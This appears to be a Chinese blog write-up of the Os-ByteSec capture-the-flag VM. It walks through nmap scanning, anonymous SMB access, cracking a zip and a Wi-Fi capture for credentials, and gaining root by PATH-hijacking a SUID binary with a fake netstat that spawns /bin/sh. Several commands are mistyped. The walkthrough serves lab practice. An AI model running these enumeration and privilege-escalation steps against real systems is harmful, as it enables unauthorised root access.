Os-ByteSec靶机

首先将kali桥接到virtualbox的网卡上。打开kali查看本机ip然后nmap搜索同一网段下有哪些ip。nmap -sP 192.168.56.1/24

然后打开靶机,用kali再扫一遍,发现多出一个ip,就是靶机的ip了,靶机ip为:192.168.56.101

用namp查询靶机的开放端口,,查询到80,139.445.2525端口是开放的

然后进入网站观察有无漏洞,192.168.56.101:80

除了几张图片就没有什么收获,于是去百度搜索其他端口的漏洞

139和445有名的就是那个永恒之蓝也是smb漏洞,但这是Ubuntu不是windows所以,经百度查询输入命令:mbclient//192.168.56.101/myshare -U smb直接进入,无密码,得到两个文件,下载到本地解压但是需要密码,于是用fcrackzip爆破,得到zip密码hacker1

解压得到文件secret.jpg和user.cap,图片没什么东西,使用aircrack-ng破解user.cap文件。得到用户名和密码。用这个账号密码登入靶机,得到user.txt,打开得到第一个flag,user.flag


第二个root.flag就是需要提升权限去获得了,再度娘寻找大部分linux提权的文章,找到一篇与我此刻情况差不多的文章https://www.anquanke.com/post/id/146799

按照作者的方法走,在find命令的帮助下不浪费时间的搜索具有SUID或4000权限的文件。find / -perm -u=s -type f2>/dev/null


然后我们进入/usr/bin,看到netscan比较可疑,运行这个文件,在这里它看起来像文件netscan试图运行netstat,在查看端口状态。再提权

cd/tmp       

echo"/bin/sh"> netstat                      (创建文件netstat)

chmod 777 netstat                            

echo$PATH                                       (查看当前环境变量)

export PATH=/tmp:$PATH                 (设置环境变量PATH)

cd/usr/bin           

./netscan 

whoami

root


此时已经变成root权限,进入root目录,ls查看所有文件发现有个root.txt.这就是另一个flag了

你可能感兴趣的:(Os-ByteSec靶机)